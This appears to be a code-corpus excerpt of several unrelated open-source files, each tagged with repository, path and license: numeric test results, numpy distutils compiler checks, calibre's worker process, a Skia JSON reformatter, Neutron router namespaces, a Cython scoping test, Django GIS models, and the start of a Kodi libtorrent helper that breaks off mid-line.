1.5760731697083,
1.5264053344727,
1.34929728508,
1.304829955101,
1.2522557973862,
1.222869515419,
1.198047041893,
1.1770839691162,
1.1743944883347,
1.1571066379547,
1.1274864673615,
1.0574153661728,
1.058304309845,
.99898308515549,
.9789143204689,
1.0070173740387,
1.000718832016,
1.0104174613953,
1.0486439466476,
1.0058424472809,
.98470783233643,
1.0119106769562,
1.0649236440659,
1.0346088409424,
1.0540577173233,
1.0704846382141,
.97923594713211,
.90216588973999,
.9271782040596,
.85819715261459,
.75488126277924,
.78776079416275,
.77047789096832,
.77089905738831,
.8313245177269,
.82229107618332,
.90476810932159,
.94439232349396,
1.0379292964935,
1.1469690799713,
1.1489590406418,
1.2257302999496,
1.1554099321365,
1.1260533332825,
.9811190366745,
.8436843752861,
.95287209749222,
.90993344783783,
.94875508546829,
1.0115815401077,
.94450175762177,
.87282890081406,
.91741597652435,
.98511207103729,
.9972335100174,
1.0975805521011,
1.1823329925537,
1.1487929821014,
1.270641207695,
1.2083609104156,
1.696394443512,
1.4628355503082,
1.4307631254196,
1.5087975263596,
1.1542117595673,
1.2262620925903,
1.3880327939987,
1.3853038549423,
1.4396153688431,
1.7208145856857,
1.678991317749,
2.110867023468,
1.524417757988,
.57946246862411,
.56406193971634,
.74643105268478])
icstats = np.array([ 202,
np.nan,
-242.89663276735,
3,
491.79326553469,
501.7180686269])
class Bunch(dict):
def __init__(self, **kw):
dict.__init__(self, kw)
self.__dict__ = self
results = Bunch(llf=llf, nobs=nobs, k=k, k_exog=k_exog, sigma=sigma, chi2=chi2, df_model=df_model, k_ar=k_ar, k_ma=k_ma, params=params, cov_params=cov_params, xb=xb, y=y, resid=resid, yr=yr, mse=mse, stdp=stdp, icstats=icstats, )
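# Illustrative note (not part of the original results file): Bunch subclasses
# dict and aliases __dict__ to itself, so the regression values above can be
# read either as keys or as attributes. A minimal sketch of how a test might
# consume them; `fitted_model` is a hypothetical ARIMA(1,1,1) fit, not defined
# in this file:
#
#     from numpy.testing import assert_allclose
#     assert_allclose(fitted_model.llf, results.llf)            # attribute access
#     assert_allclose(fitted_model.params, results['params'])   # key access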
|
bsd-3-clause
|
sinhrks/numpy
|
numpy/distutils/command/config.py
|
11
|
15829
|
# Added Fortran compiler support to config. Currently useful only for
# try_compile call. try_run works but is untested for most Fortran
# compilers (they must define linker_exe first).
# Pearu Peterson
from __future__ import division, absolute_import, print_function
import os, signal
import warnings
import sys
from distutils.command.config import config as old_config
from distutils.command.config import LANG_EXT
from distutils import log
from distutils.file_util import copy_file
from distutils.ccompiler import CompileError, LinkError
import distutils
from numpy.distutils.exec_command import exec_command
from numpy.distutils.mingw32ccompiler import generate_manifest
from numpy.distutils.command.autodist import (check_gcc_function_attribute,
check_gcc_variable_attribute,
check_inline,
check_restrict,
check_compiler_gcc4)
from numpy.distutils.compat import get_exception
LANG_EXT['f77'] = '.f'
LANG_EXT['f90'] = '.f90'
class config(old_config):
old_config.user_options += [
('fcompiler=', None, "specify the Fortran compiler type"),
]
def initialize_options(self):
self.fcompiler = None
old_config.initialize_options(self)
def _check_compiler (self):
old_config._check_compiler(self)
from numpy.distutils.fcompiler import FCompiler, new_fcompiler
if sys.platform == 'win32' and self.compiler.compiler_type == 'msvc':
# XXX: hack to circumvent a python 2.6 bug with msvc9compiler:
# initialize() calls query_vcvarsall, which throws an IOError and
# causes an error along the way without much information. We try to
# catch it here, hoping it is early enough, and print a helpful
# message instead of Error: None.
if not self.compiler.initialized:
try:
self.compiler.initialize()
except IOError:
e = get_exception()
msg = """\
Could not initialize compiler instance: do you have Visual Studio
installed? If you are trying to build with MinGW, please use "python setup.py
build -c mingw32" instead. If you have Visual Studio installed, check it is
correctly installed, and the right version (VS 2008 for python 2.6, 2.7 and 3.2,
VS 2010 for >= 3.3).
Original exception was: %s, and the Compiler class was %s
============================================================================""" \
% (e, self.compiler.__class__.__name__)
print ("""\
============================================================================""")
raise distutils.errors.DistutilsPlatformError(msg)
# After MSVC is initialized, add an explicit /MANIFEST to linker
# flags. See issues gh-4245 and gh-4101 for details. Also
# relevant are issues 4431 and 16296 on the Python bug tracker.
from distutils import msvc9compiler
if msvc9compiler.get_build_version() >= 10:
for ldflags in [self.compiler.ldflags_shared,
self.compiler.ldflags_shared_debug]:
if '/MANIFEST' not in ldflags:
ldflags.append('/MANIFEST')
if not isinstance(self.fcompiler, FCompiler):
self.fcompiler = new_fcompiler(compiler=self.fcompiler,
dry_run=self.dry_run, force=1,
c_compiler=self.compiler)
if self.fcompiler is not None:
self.fcompiler.customize(self.distribution)
if self.fcompiler.get_version():
self.fcompiler.customize_cmd(self)
self.fcompiler.show_customization()
def _wrap_method(self, mth, lang, args):
from distutils.ccompiler import CompileError
from distutils.errors import DistutilsExecError
save_compiler = self.compiler
if lang in ['f77', 'f90']:
self.compiler = self.fcompiler
try:
ret = mth(*((self,)+args))
except (DistutilsExecError, CompileError):
msg = str(get_exception())
self.compiler = save_compiler
raise CompileError(msg)
self.compiler = save_compiler
return ret
def _compile (self, body, headers, include_dirs, lang):
return self._wrap_method(old_config._compile, lang,
(body, headers, include_dirs, lang))
def _link (self, body,
headers, include_dirs,
libraries, library_dirs, lang):
if self.compiler.compiler_type=='msvc':
libraries = (libraries or [])[:]
library_dirs = (library_dirs or [])[:]
if lang in ['f77', 'f90']:
lang = 'c' # always use system linker when using MSVC compiler
if self.fcompiler:
for d in self.fcompiler.library_dirs or []:
# correct path when compiling in Cygwin but with
# normal Win Python
if d.startswith('/usr/lib'):
s, o = exec_command(['cygpath', '-w', d],
use_tee=False)
if not s: d = o
library_dirs.append(d)
for libname in self.fcompiler.libraries or []:
if libname not in libraries:
libraries.append(libname)
for libname in libraries:
if libname.startswith('msvc'): continue
fileexists = False
for libdir in library_dirs or []:
libfile = os.path.join(libdir, '%s.lib' % (libname))
if os.path.isfile(libfile):
fileexists = True
break
if fileexists: continue
# make g77-compiled static libs available to MSVC
fileexists = False
for libdir in library_dirs:
libfile = os.path.join(libdir, 'lib%s.a' % (libname))
if os.path.isfile(libfile):
# copy libname.a file to name.lib so that MSVC linker
# can find it
libfile2 = os.path.join(libdir, '%s.lib' % (libname))
copy_file(libfile, libfile2)
self.temp_files.append(libfile2)
fileexists = True
break
if fileexists: continue
log.warn('could not find library %r in directories %s' \
% (libname, library_dirs))
elif self.compiler.compiler_type == 'mingw32':
generate_manifest(self)
return self._wrap_method(old_config._link, lang,
(body, headers, include_dirs,
libraries, library_dirs, lang))
def check_header(self, header, include_dirs=None, library_dirs=None, lang='c'):
self._check_compiler()
return self.try_compile(
"/* we need a dummy line to make distutils happy */",
[header], include_dirs)
def check_decl(self, symbol,
headers=None, include_dirs=None):
self._check_compiler()
body = """
int main(void)
{
#ifndef %s
(void) %s;
#endif
;
return 0;
}""" % (symbol, symbol)
return self.try_compile(body, headers, include_dirs)
def check_macro_true(self, symbol,
headers=None, include_dirs=None):
self._check_compiler()
body = """
int main(void)
{
#if %s
#else
#error false or undefined macro
#endif
;
return 0;
}""" % (symbol,)
return self.try_compile(body, headers, include_dirs)
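# Illustrative usage sketch (not part of the original module). Assuming `cfg`
# is the config command instance obtained during a numpy.distutils setup run,
# the two helpers above reduce to small try_compile() probes:
#
#     have_size_max = cfg.check_decl('SIZE_MAX', headers=['stdint.h'])
#     is_glibc = cfg.check_macro_true('__GLIBC__', headers=['features.h'])
#
# Both return the result of try_compile(), i.e. whether the generated C
# snippet compiled.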
def check_type(self, type_name, headers=None, include_dirs=None,
library_dirs=None):
"""Check type availability. Return True if the type can be compiled,
False otherwise"""
self._check_compiler()
# First check the type can be compiled
body = r"""
int main(void) {
if ((%(name)s *) 0)
return 0;
if (sizeof (%(name)s))
return 0;
}
""" % {'name': type_name}
st = False
try:
try:
self._compile(body, headers, include_dirs, 'c')
st = True
except distutils.errors.CompileError:
st = False
finally:
self._clean()
return st
def check_type_size(self, type_name, headers=None, include_dirs=None, library_dirs=None, expected=None):
"""Check size of a given type."""
self._check_compiler()
# First check the type can be compiled
body = r"""
typedef %(type)s npy_check_sizeof_type;
int main (void)
{
static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) >= 0)];
test_array [0] = 0
;
return 0;
}
"""
self._compile(body % {'type': type_name},
headers, include_dirs, 'c')
self._clean()
if expected:
body = r"""
typedef %(type)s npy_check_sizeof_type;
int main (void)
{
static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == %(size)s)];
test_array [0] = 0
;
return 0;
}
"""
for size in expected:
try:
self._compile(body % {'type': type_name, 'size': size},
headers, include_dirs, 'c')
self._clean()
return size
except CompileError:
pass
# this fails to *compile* if size > sizeof(type)
body = r"""
typedef %(type)s npy_check_sizeof_type;
int main (void)
{
static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) <= %(size)s)];
test_array [0] = 0
;
return 0;
}
"""
# The principle is simple: we first find low and high bounds of size
# for the type, where low/high are looked up on a log scale. Then, we
# do a binary search to find the exact size between low and high
low = 0
mid = 0
while True:
try:
self._compile(body % {'type': type_name, 'size': mid},
headers, include_dirs, 'c')
self._clean()
break
except CompileError:
#log.info("failure to test for bound %d" % mid)
low = mid + 1
mid = 2 * mid + 1
high = mid
# Binary search:
while low != high:
mid = (high - low) // 2 + low
try:
self._compile(body % {'type': type_name, 'size': mid},
headers, include_dirs, 'c')
self._clean()
high = mid
except CompileError:
low = mid + 1
return low
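# Illustrative usage sketch (not part of the original module). With `cfg` a
# configured config command instance, the size probe above can be driven like:
#
#     size = cfg.check_type_size('long double', expected=[8, 12, 16])
#
# The `expected` fast path tries those sizes first; otherwise the size is
# bracketed by doubling (`mid = 2 * mid + 1`) until the `sizeof(...) <= size`
# snippet compiles, then pinned down by the binary search between low and high.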
def check_func(self, func,
headers=None, include_dirs=None,
libraries=None, library_dirs=None,
decl=False, call=False, call_args=None):
# clean up distutils's config a bit: add void to main(), and
# return a value.
self._check_compiler()
body = []
if decl:
if type(decl) == str:
body.append(decl)
else:
body.append("int %s (void);" % func)
# Handle MSVC intrinsics: force MS compiler to make a function call.
# Useful to test for some functions when built with optimization on, to
# avoid build error because the intrinsic and our 'fake' test
# declaration do not match.
body.append("#ifdef _MSC_VER")
body.append("#pragma function(%s)" % func)
body.append("#endif")
body.append("int main (void) {")
if call:
if call_args is None:
call_args = ''
body.append(" %s(%s);" % (func, call_args))
else:
body.append(" %s;" % func)
body.append(" return 0;")
body.append("}")
body = '\n'.join(body) + "\n"
return self.try_link(body, headers, include_dirs,
libraries, library_dirs)
def check_funcs_once(self, funcs,
headers=None, include_dirs=None,
libraries=None, library_dirs=None,
decl=False, call=False, call_args=None):
"""Check a list of functions at once.
This is useful to speed things up, since all the functions in the funcs
list will be put in one compilation unit.
Arguments
---------
funcs : seq
list of functions to test
include_dirs : seq
list of header paths
libraries : seq
list of libraries to link the code snippet to
library_dirs : seq
list of library paths
decl : dict
for every (key, value) pair, the declaration in the value will be
used for the function named by the key. If a function is not in the
dictionary, no declaration will be used.
call : dict
for every item (f, value), if the value is True, a call will be
made to the function f.
"""
self._check_compiler()
body = []
if decl:
for f, v in decl.items():
if v:
body.append("int %s (void);" % f)
# Handle MS intrinsics. See check_func for more info.
body.append("#ifdef _MSC_VER")
for func in funcs:
body.append("#pragma function(%s)" % func)
body.append("#endif")
body.append("int main (void) {")
if call:
for f in funcs:
if f in call and call[f]:
if not (call_args and f in call_args and call_args[f]):
args = ''
else:
args = call_args[f]
body.append(" %s(%s);" % (f, args))
else:
body.append(" %s;" % f)
else:
for f in funcs:
body.append(" %s;" % f)
body.append(" return 0;")
body.append("}")
body = '\n'.join(body) + "\n"
return self.try_link(body, headers, include_dirs,
libraries, library_dirs)
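# Illustrative usage sketch (not part of the original module). Checking a few
# libm functions in a single compilation unit, with `cfg` a config command
# instance; the macro name appended below is hypothetical:
#
#     if cfg.check_funcs_once(['sin', 'cos'], libraries=['m'],
#                             decl={'sin': True, 'cos': True},
#                             call={'sin': True, 'cos': True},
#                             call_args={'sin': '0.0', 'cos': '0.0'}):
#         moredefs.append(('HAVE_TRIG_FUNCS', 1))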
def check_inline(self):
"""Return the inline keyword recognized by the compiler, empty string
otherwise."""
return check_inline(self)
def check_restrict(self):
"""Return the restrict keyword recognized by the compiler, empty string
otherwise."""
return check_restrict(self)
def check_compiler_gcc4(self):
"""Return True if the C compiler is gcc >= 4."""
return check_compiler_gcc4(self)
def check_gcc_function_attribute(self, attribute, name):
return check_gcc_function_attribute(self, attribute, name)
def check_gcc_variable_attribute(self, attribute):
return check_gcc_variable_attribute(self, attribute)
class GrabStdout(object):
def __init__(self):
self.sys_stdout = sys.stdout
self.data = ''
sys.stdout = self
def write (self, data):
self.sys_stdout.write(data)
self.data += data
def flush (self):
self.sys_stdout.flush()
def restore(self):
sys.stdout = self.sys_stdout
|
bsd-3-clause
|
AnotherIvan/calibre
|
src/calibre/utils/ipc/worker.py
|
8
|
7329
|
#!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import os, cPickle, sys, importlib
from multiprocessing.connection import Client
from threading import Thread
from Queue import Queue
from contextlib import closing
from binascii import unhexlify
from zipimport import ZipImportError
from calibre import prints
from calibre.constants import iswindows, isosx
from calibre.utils.ipc import eintr_retry_call
PARALLEL_FUNCS = {
'lrfviewer' :
('calibre.gui2.lrf_renderer.main', 'main', None),
'ebook-viewer' :
('calibre.gui_launch', 'ebook_viewer', None),
'ebook-edit' :
('calibre.gui_launch', 'gui_ebook_edit', None),
'render_pages' :
('calibre.ebooks.comic.input', 'render_pages', 'notification'),
'gui_convert' :
('calibre.gui2.convert.gui_conversion', 'gui_convert', 'notification'),
'gui_polish' :
('calibre.ebooks.oeb.polish.main', 'gui_polish', None),
'gui_convert_override' :
('calibre.gui2.convert.gui_conversion', 'gui_convert_override', 'notification'),
'gui_catalog' :
('calibre.gui2.convert.gui_conversion', 'gui_catalog', 'notification'),
'move_library' :
('calibre.library.move', 'move_library', 'notification'),
'arbitrary' :
('calibre.utils.ipc.worker', 'arbitrary', None),
'arbitrary_n' :
('calibre.utils.ipc.worker', 'arbitrary_n', 'notification'),
}
class Progress(Thread):
def __init__(self, conn):
Thread.__init__(self)
self.daemon = True
self.conn = conn
self.queue = Queue()
def __call__(self, percent, msg=''):
self.queue.put((percent, msg))
def run(self):
while True:
x = self.queue.get()
if x is None:
break
try:
eintr_retry_call(self.conn.send, x)
except:
break
def arbitrary(module_name, func_name, args, kwargs={}):
'''
An entry point that allows arbitrary functions to be run in a parallel
process. Useful for plugin developers who want to run jobs in a parallel
process.
To use this entry point, simply create a ParallelJob with the module and
function names for the real entry point.
Remember that args and kwargs must be serializable, so only use basic types
for them.
To use this, you will do something like
from calibre.gui2 import Dispatcher
gui.job_manager.run_job(Dispatcher(job_done), 'arbitrary',
args=('calibre_plugins.myplugin.worker', 'do_work',
('arg1', 'arg2', 'arg3')),
description='Change the world')
The function job_done will be called on completion, see the code in
gui2.actions.catalog for an example of using run_job and Dispatcher.
:param module_name: The fully qualified name of the module that contains
the actual function to be run. For example:
calibre_plugins.myplugin.worker
:param func_name: The name of the function to be run.
:param args: A list (or tuple) of arguments that will be passed to the
function ``func_name``
:param kwargs: A dictionary of keyword arguments to pass to func_name
'''
if module_name.startswith('calibre_plugins'):
# Initialize the plugin loader by doing this dummy import
from calibre.customize.ui import find_plugin
find_plugin
module = importlib.import_module(module_name)
func = getattr(module, func_name)
return func(*args, **kwargs)
def arbitrary_n(module_name, func_name, args, kwargs={},
notification=lambda x, y: y):
'''
Same as :func:`arbitrary` above, except that func_name must support a
keyword argument "notification". This will be a function that accepts two
arguments. func_name should call it periodically with progress information.
The first argument is a float between 0 and 1 that represents the percent
completed and the second is a string with a message (it can be an empty
string).
'''
if module_name.startswith('calibre_plugins'):
# Initialize the plugin loader by doing this dummy import
from calibre.customize.ui import find_plugin
find_plugin
module = importlib.import_module(module_name)
func = getattr(module, func_name)
kwargs['notification'] = notification
return func(*args, **kwargs)
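# Illustrative sketch (not part of the original module): a plugin-side target
# compatible with the 'arbitrary_n' entry point. All names are hypothetical;
# the only contract is the extra ``notification`` keyword argument.
#
#     def do_work(path, notification=lambda frac, msg='': None):
#         for i in range(10):
#             # ... real work on `path` goes here ...
#             notification((i + 1) / 10.0, 'step %d of 10' % (i + 1))
#         return 'done'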
def get_func(name):
module, func, notification = PARALLEL_FUNCS[name]
try:
module = importlib.import_module(module)
except ZipImportError:
# Something weird happened on windows, try clearing the zip import cache
# in case the zipfile was changed from under us
from zipimport import _zip_directory_cache as zdc
zdc.clear()
module = importlib.import_module(module)
func = getattr(module, func)
return func, notification
def main():
if iswindows:
if '--multiprocessing-fork' in sys.argv:
# We are using the multiprocessing module on windows to launch a
# worker process
from multiprocessing import freeze_support
freeze_support()
return 0
# Close open file descriptors inherited from parent
# On Unix this is done by the subprocess module
os.closerange(3, 256)
if isosx and 'CALIBRE_WORKER_ADDRESS' not in os.environ and '--pipe-worker' not in sys.argv:
# On some OS X computers launchd apparently tries to
# launch the last run process from the bundle,
# so launch the GUI as usual
from calibre.gui2.main import main as gui_main
return gui_main(['calibre'])
csw = os.environ.get('CALIBRE_SIMPLE_WORKER', None)
if csw:
mod, _, func = csw.partition(':')
mod = importlib.import_module(mod)
func = getattr(mod, func)
func()
return
if '--pipe-worker' in sys.argv:
try:
exec (sys.argv[-1])
except Exception:
print 'Failed to run pipe worker with command:', sys.argv[-1]
raise
return
address = cPickle.loads(unhexlify(os.environ['CALIBRE_WORKER_ADDRESS']))
key = unhexlify(os.environ['CALIBRE_WORKER_KEY'])
resultf = unhexlify(os.environ['CALIBRE_WORKER_RESULT']).decode('utf-8')
with closing(Client(address, authkey=key)) as conn:
name, args, kwargs, desc = eintr_retry_call(conn.recv)
if desc:
prints(desc)
sys.stdout.flush()
func, notification = get_func(name)
notifier = Progress(conn)
if notification:
kwargs[notification] = notifier
notifier.start()
result = func(*args, **kwargs)
if result is not None and os.path.exists(os.path.dirname(resultf)):
cPickle.dump(result, open(resultf, 'wb'), -1)
notifier.queue.put(None)
try:
sys.stdout.flush()
except EnvironmentError:
pass # Happens sometimes on OS X for GUI processes (EPIPE)
try:
sys.stderr.flush()
except EnvironmentError:
pass # Happens sometimes on OS X for GUI processes (EPIPE)
return 0
if __name__ == '__main__':
sys.exit(main())
|
gpl-3.0
|
houst0nn/external_skia
|
tools/reformat-json.py
|
208
|
1741
|
#!/usr/bin/python
'''
Copyright 2013 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
'''
'''
Rewrites a JSON file to use Python's standard JSON pretty-print format,
so that subsequent runs of rebaseline.py will generate useful diffs
(only the actual checksum differences will show up as diffs, not obscured
by format differences).
Should not modify the JSON contents in any meaningful way.
'''
# System-level imports
import argparse
import os
import sys
# Imports from within Skia
#
# We need to add the 'gm' directory, so that we can import gm_json.py within
# that directory. That script allows us to parse the actual-results.json file
# written out by the GM tool.
# Make sure that the 'gm' dir is in the PYTHONPATH, but add it at the *end*
# so any dirs that are already in the PYTHONPATH will be preferred.
#
# This assumes that the 'gm' directory has been checked out as a sibling of
# the 'tools' directory containing this script, which will be the case if
# 'trunk' was checked out as a single unit.
GM_DIRECTORY = os.path.realpath(
os.path.join(os.path.dirname(os.path.dirname(__file__)), 'gm'))
if GM_DIRECTORY not in sys.path:
sys.path.append(GM_DIRECTORY)
import gm_json
def Reformat(filename):
print 'Reformatting file %s...' % filename
gm_json.WriteToFile(gm_json.LoadFromFile(filename), filename)
def _Main():
parser = argparse.ArgumentParser(description='Reformat JSON files in-place.')
parser.add_argument('filenames', metavar='FILENAME', nargs='+',
help='file to reformat')
args = parser.parse_args()
for filename in args.filenames:
Reformat(filename)
sys.exit(0)
if __name__ == '__main__':
_Main()
|
bsd-3-clause
|
waltBB/neutron_read
|
neutron/agent/l3/namespaces.py
|
6
|
3002
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron.agent.linux import ip_lib
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
NS_PREFIX = 'qrouter-'
INTERNAL_DEV_PREFIX = 'qr-'
EXTERNAL_DEV_PREFIX = 'qg-'
# TODO(Carl) It is odd that this file needs this. It is a dvr detail.
ROUTER_2_FIP_DEV_PREFIX = 'rfp-'
class Namespace(object):
def __init__(self, name, agent_conf, driver, use_ipv6):
self.name = name
self.ip_wrapper_root = ip_lib.IPWrapper()
self.agent_conf = agent_conf
self.driver = driver
self.use_ipv6 = use_ipv6
def create(self):
ip_wrapper = self.ip_wrapper_root.ensure_namespace(self.name)
cmd = ['sysctl', '-w', 'net.ipv4.ip_forward=1']
ip_wrapper.netns.execute(cmd)
if self.use_ipv6:
cmd = ['sysctl', '-w', 'net.ipv6.conf.all.forwarding=1']
ip_wrapper.netns.execute(cmd)
def delete(self):
if self.agent_conf.router_delete_namespaces:
try:
self.ip_wrapper_root.netns.delete(self.name)
except RuntimeError:
msg = _LE('Failed trying to delete namespace: %s')
LOG.exception(msg, self.name)
class RouterNamespace(Namespace):
def __init__(self, router_id, agent_conf, driver, use_ipv6):
self.router_id = router_id
name = self._get_ns_name(router_id)
super(RouterNamespace, self).__init__(
name, agent_conf, driver, use_ipv6)
@staticmethod
def _get_ns_name(router_id):
return (NS_PREFIX + router_id)
def delete(self):
ns_ip = ip_lib.IPWrapper(namespace=self.name)
for d in ns_ip.get_devices(exclude_loopback=True):
if d.name.startswith(INTERNAL_DEV_PREFIX):
# device is on default bridge
self.driver.unplug(d.name, namespace=self.name,
prefix=INTERNAL_DEV_PREFIX)
elif d.name.startswith(ROUTER_2_FIP_DEV_PREFIX):
ns_ip.del_veth(d.name)
elif d.name.startswith(EXTERNAL_DEV_PREFIX):
self.driver.unplug(
d.name,
bridge=self.agent_conf.external_network_bridge,
namespace=self.name,
prefix=EXTERNAL_DEV_PREFIX)
super(RouterNamespace, self).delete()
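# Illustrative usage sketch (not part of the original module). The L3 agent
# normally drives these objects; agent_conf, driver and use_ipv6 are assumed
# here to come from its configuration:
#
#     ns = RouterNamespace(router_id, agent_conf, driver, use_ipv6=False)
#     ns.create()   # ensures the qrouter-<router_id> namespace, enables forwarding
#     ...           # qr-/qg- devices are plugged via the driver
#     ns.delete()   # unplugs qr-/qg-/rfp- devices, then removes the namespace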
|
apache-2.0
|
hickford/cython
|
tests/run/pyclass_scope_T671.py
|
28
|
1624
|
# mode: run
# ticket: 671
A = 1234
class SimpleAssignment(object):
"""
>>> SimpleAssignment.A
1234
"""
A = A
class SimpleRewrite(object):
"""
>>> SimpleRewrite.A
4321
"""
A = 4321
A = A
def simple_inner(a):
"""
>>> simple_inner(4321).A
1234
"""
A = a
class X(object):
A = A
return X
def conditional(a, cond):
"""
>>> conditional(4321, False).A
1234
>>> conditional(4321, True).A
4321
"""
class X(object):
if cond:
A = a
A = A
return X
def name_error():
"""
>>> name_error() #doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...B...
"""
class X(object):
B = B
def conditional_name_error(cond):
"""
>>> conditional_name_error(True).B
4321
>>> conditional_name_error(False).B #doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...B...
"""
class X(object):
if cond:
B = 4321
B = B
return X
C = 1111
del C
def name_error_deleted():
"""
>>> name_error_deleted() #doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...C...
"""
class X(object):
C = C
_set = set
def name_lookup_order():
"""
>>> Scope = name_lookup_order()
>>> Scope().set(2)
42
>>> Scope.test1 == _set()
True
>>> Scope.test2 == _set()
True
"""
class Scope(object):
test1 = set()
test2 = set()
def set(self, x):
return 42
return Scope
|
apache-2.0
|
aparo/django-nonrel
|
django/contrib/gis/tests/distapp/models.py
|
406
|
1832
|
from django.contrib.gis.db import models
class SouthTexasCity(models.Model):
"City model on projected coordinate system for South Texas."
name = models.CharField(max_length=30)
point = models.PointField(srid=32140)
objects = models.GeoManager()
def __unicode__(self): return self.name
class SouthTexasCityFt(models.Model):
"Same City model as above, but U.S. survey feet are the units."
name = models.CharField(max_length=30)
point = models.PointField(srid=2278)
objects = models.GeoManager()
def __unicode__(self): return self.name
class AustraliaCity(models.Model):
"City model for Australia, using WGS84."
name = models.CharField(max_length=30)
point = models.PointField()
objects = models.GeoManager()
def __unicode__(self): return self.name
class CensusZipcode(models.Model):
"Model for a few South Texas ZIP codes (in original Census NAD83)."
name = models.CharField(max_length=5)
poly = models.PolygonField(srid=4269)
objects = models.GeoManager()
def __unicode__(self): return self.name
class SouthTexasZipcode(models.Model):
"Model for a few South Texas ZIP codes."
name = models.CharField(max_length=5)
poly = models.PolygonField(srid=32140, null=True)
objects = models.GeoManager()
def __unicode__(self): return self.name
class Interstate(models.Model):
"Geodetic model for U.S. Interstates."
name = models.CharField(max_length=10)
path = models.LineStringField()
objects = models.GeoManager()
def __unicode__(self): return self.name
class SouthTexasInterstate(models.Model):
"Projected model for South Texas Interstates."
name = models.CharField(max_length=10)
path = models.LineStringField(srid=32140)
objects = models.GeoManager()
def __unicode__(self): return self.name
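# Illustrative query sketch (not part of the original models file), showing the
# kind of distance lookup these test models exercise; `pnt` is a hypothetical
# Point in the model's coordinate system:
#
#     from django.contrib.gis.measure import D
#     nearby = SouthTexasCity.objects.filter(point__distance_lte=(pnt, D(km=7)))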
|
bsd-3-clause
|
alfa-addon/addon
|
plugin.video.alfa/lib/python_libtorrent/python_libtorrent/functions.py
|
1
|
10908
|
#-*- coding: utf-8 -*-
'''
python-libtorrent for Kodi (script.module.libtorrent)
Copyright (C) 2015-2016 DiMartino, srg70, RussakHH, aisman
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
from __future__ import absolute_import
from builtins import object
import sys
PY3 = False
if sys.version_info[0] >= 3: PY3 = True; unicode = str; unichr = chr; long = int
import time
import xbmc, xbmcgui, xbmcaddon
from .net import HTTP
from core import filetools ### Alfa
from core import ziptools
from platformcode import config ### Alfa
#__libbaseurl__ = "https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
#__settings__ = xbmcaddon.Addon(id='script.module.libtorrent')
#__version__ = __settings__.getAddonInfo('version')
#__plugin__ = __settings__.getAddonInfo('name') + " v." + __version__
#__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
# 'script.module.libtorrent', 'icon.png')
#__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
__version__ = '2.0.2' ### Alfa
__plugin__ = "python-libtorrent v.2.0.2" ### Alfa
__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
'plugin.video.alfa', 'icon.png') ### Alfa
#__language__ = __settings__.getLocalizedString ### Alfa
#from python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
from lib.python_libtorrent.python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
def log(msg):
if PY3:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGINFO )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGINFO )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGINFO )
else:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGNOTICE )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGNOTICE )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGNOTICE )
def getSettingAsBool(setting):
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
return __settings__.getSetting(setting).lower() == "true"
class LibraryManager(object):
def __init__(self, dest_path, platform):
self.dest_path = dest_path
self.platform = platform
self.root=filetools.dirname(filetools.dirname(__file__))
ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: rest of the method
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
